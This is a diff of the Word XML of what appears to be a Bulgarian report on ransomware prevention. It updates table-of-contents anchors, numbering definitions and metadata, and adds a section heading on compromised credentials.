+        <w:t xml:space="preserve">Компрометирани </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>credentials</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:bookmarkStart w:id="11" w:name="_Toc223339504" w:displacedByCustomXml="next"/>
     <w:sdt>
       <w:sdtPr>
         <w:rPr>
@@ -3924,7 +4248,7 @@
           <w:r>
             <w:t>Цитирани източници</w:t>
           </w:r>
-          <w:bookmarkEnd w:id="10"/>
+          <w:bookmarkEnd w:id="11"/>
         </w:p>
         <w:p>
           <w:pPr>
@@ -4505,6 +4829,92 @@
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="02B218B7"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="5AACF5DC"/>
+    <w:lvl w:ilvl="0" w:tplc="0409000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3960" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4680" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5400" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6120" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="14C860D3"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="F848A848"/>
@@ -4590,7 +5000,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="23162974"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="0852987A"/>
@@ -4679,7 +5089,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="48716B86"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="84CC0C2A"/>
@@ -4792,7 +5202,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5751104B"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="865AD2D2"/>
@@ -4881,17 +5291,109 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="7235233B"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="82E8934C"/>
+    <w:lvl w:ilvl="0" w:tplc="0409000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3960" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4680" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5400" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6120" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="797143732">
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="2" w16cid:durableId="646785427">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="3" w16cid:durableId="893583929">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="4" w16cid:durableId="892738569">
     <w:abstractNumId w:val="3"/>
   </w:num>
-  <w:num w:numId="2" w16cid:durableId="646785427">
+  <w:num w:numId="5" w16cid:durableId="1113406297">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="6" w16cid:durableId="1349334172">
     <w:abstractNumId w:val="0"/>
-  </w:num>
-  <w:num w:numId="3" w16cid:durableId="893583929">
-    <w:abstractNumId w:val="1"/>
-  </w:num>
-  <w:num w:numId="4" w16cid:durableId="892738569">
-    <w:abstractNumId w:val="2"/>
   </w:num>
 </w:numbering>
 </file>
@@ -5506,7 +6008,6 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
@@ -6242,6 +6743,23 @@
 </file>
 
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
+<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
+  <documentManagement>
+    <_activity xmlns="16eb03e4-fe34-41e0-b148-6c2f228be8b6" xsi:nil="true"/>
+  </documentManagement>
+</p:properties>
+</file>
+
+<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
+<?mso-contentType ?>
+<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
+  <Display>DocumentLibraryForm</Display>
+  <Edit>DocumentLibraryForm</Edit>
+  <New>DocumentLibraryForm</New>
+</FormTemplates>
+</file>
+
+<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
 <ct:contentTypeSchema xmlns:ct="http://schemas.microsoft.com/office/2006/metadata/contentType" xmlns:ma="http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributes" ct:_="" ma:_="" ma:contentTypeName="Document" ma:contentTypeID="0x010100EA7F95447AE5CD4A96E24D58484FA3D2" ma:contentTypeVersion="9" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="152a1f3b266b5df558eb501d08fa54b7">
   <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="16eb03e4-fe34-41e0-b148-6c2f228be8b6" xmlns:ns4="c5dcd230-26b3-4f1e-a7d8-2c2a40be033b" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="ebbaa98d623378dfae11ad7cf338cc80" ns3:_="" ns4:_="">
     <xsd:import namespace="16eb03e4-fe34-41e0-b148-6c2f228be8b6"/>
@@ -6436,23 +6954,6 @@
 </ct:contentTypeSchema>
 </file>
 
-<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
-<?mso-contentType ?>
-<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
-  <Display>DocumentLibraryForm</Display>
-  <Edit>DocumentLibraryForm</Edit>
-  <New>DocumentLibraryForm</New>
-</FormTemplates>
-</file>
-
-<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
-<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
-  <documentManagement>
-    <_activity xmlns="16eb03e4-fe34-41e0-b148-6c2f228be8b6" xsi:nil="true"/>
-  </documentManagement>
-</p:properties>
-</file>
-
 <file path=customXml/item4.xml><?xml version="1.0" encoding="utf-8"?>
 <b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\IEEE2006OfficeOnline.xsl" StyleName="IEEE" Version="2006">
   <b:Source>
@@ -6582,6 +7083,24 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{6C2A65B6-C891-4DE3-96AA-342988F8CBF9}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
+    <ds:schemaRef ds:uri="16eb03e4-fe34-41e0-b148-6c2f228be8b6"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
+</file>
+
+<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{95434D9A-8BA9-420D-93D1-CF746F074EA1}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
+</file>
+
+<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{EC25E0E9-ED1E-4DED-B1D8-B99F35F6AB52}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/contentType"/>
@@ -6600,28 +7119,16 @@
 </ds:datastoreItem>
 </file>
 
-<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{95434D9A-8BA9-420D-93D1-CF746F074EA1}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
-</file>
-
-<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{6C2A65B6-C891-4DE3-96AA-342988F8CBF9}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
-    <ds:schemaRef ds:uri="16eb03e4-fe34-41e0-b148-6c2f228be8b6"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
-</file>
-
 <file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{9EC5290A-2DE6-49DB-A151-226064C42EFF}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
 </ds:datastoreItem>
+</file>
+
+<file path=docMetadata/LabelInfo.xml><?xml version="1.0" encoding="utf-8"?>
+<clbl:labelList xmlns:clbl="http://schemas.microsoft.com/office/2020/mipLabelMetadata">
+  <clbl:label id="{0cf7ac0a-4681-4823-ab0b-04ef02c5f873}" enabled="1" method="Standard" siteId="{42f7676c-f455-423c-82f6-dc2d99791af7}" contentBits="0" removed="0"/>
+</clbl:labelList>
 </file>
--- a/Ransomware.docx
+++ b/Ransomware.docx
@@ -499,7 +499,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc223339493" w:history="1">
+          <w:hyperlink w:anchor="_Toc223341818" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -527,7 +527,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223339493 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223341818 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -570,7 +570,7 @@
               <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223339494" w:history="1">
+          <w:hyperlink w:anchor="_Toc223341819" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -605,7 +605,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223339494 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223341819 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -648,7 +648,7 @@
               <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223339495" w:history="1">
+          <w:hyperlink w:anchor="_Toc223341820" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -683,7 +683,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223339495 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223341820 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -727,7 +727,7 @@
               <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223339496" w:history="1">
+          <w:hyperlink w:anchor="_Toc223341821" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -777,7 +777,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223339496 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223341821 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -821,7 +821,7 @@
               <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223339497" w:history="1">
+          <w:hyperlink w:anchor="_Toc223341822" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -886,7 +886,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223339497 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223341822 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -930,7 +930,7 @@
               <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223339498" w:history="1">
+          <w:hyperlink w:anchor="_Toc223341823" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -974,7 +974,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223339498 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223341823 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1018,7 +1018,7 @@
               <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223339499" w:history="1">
+          <w:hyperlink w:anchor="_Toc223341824" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1084,7 +1084,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223339499 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223341824 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1128,7 +1128,7 @@
               <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223339500" w:history="1">
+          <w:hyperlink w:anchor="_Toc223341825" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1186,7 +1186,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223339500 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223341825 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1229,7 +1229,7 @@
               <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223339501" w:history="1">
+          <w:hyperlink w:anchor="_Toc223341826" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1264,7 +1264,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223339501 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223341826 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1308,7 +1308,7 @@
               <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223339502" w:history="1">
+          <w:hyperlink w:anchor="_Toc223341827" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1365,7 +1365,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223339502 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223341827 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1409,7 +1409,7 @@
               <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223339503" w:history="1">
+          <w:hyperlink w:anchor="_Toc223341828" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1431,22 +1431,93 @@
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t xml:space="preserve">Превенция на </w:t>
-            </w:r>
+              <w:t>Превенция на интернет-достъпни уязвимости</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223341828 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>13</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="720"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
+              <w:noProof/>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc223341829" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
+              </w:rPr>
+              <w:t>3.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
+                <w:noProof/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t xml:space="preserve">Ransomware </w:t>
+              <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t xml:space="preserve">при </w:t>
+              <w:t xml:space="preserve">Компрометирани </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1454,14 +1525,7 @@
                 <w:noProof/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>I</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t>nternet-Facing Vulnerabilities</w:t>
+              <w:t>credentials</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1482,7 +1546,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223339503 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223341829 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1502,7 +1566,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>13</w:t>
+              <w:t>14</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1525,7 +1589,7 @@
               <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
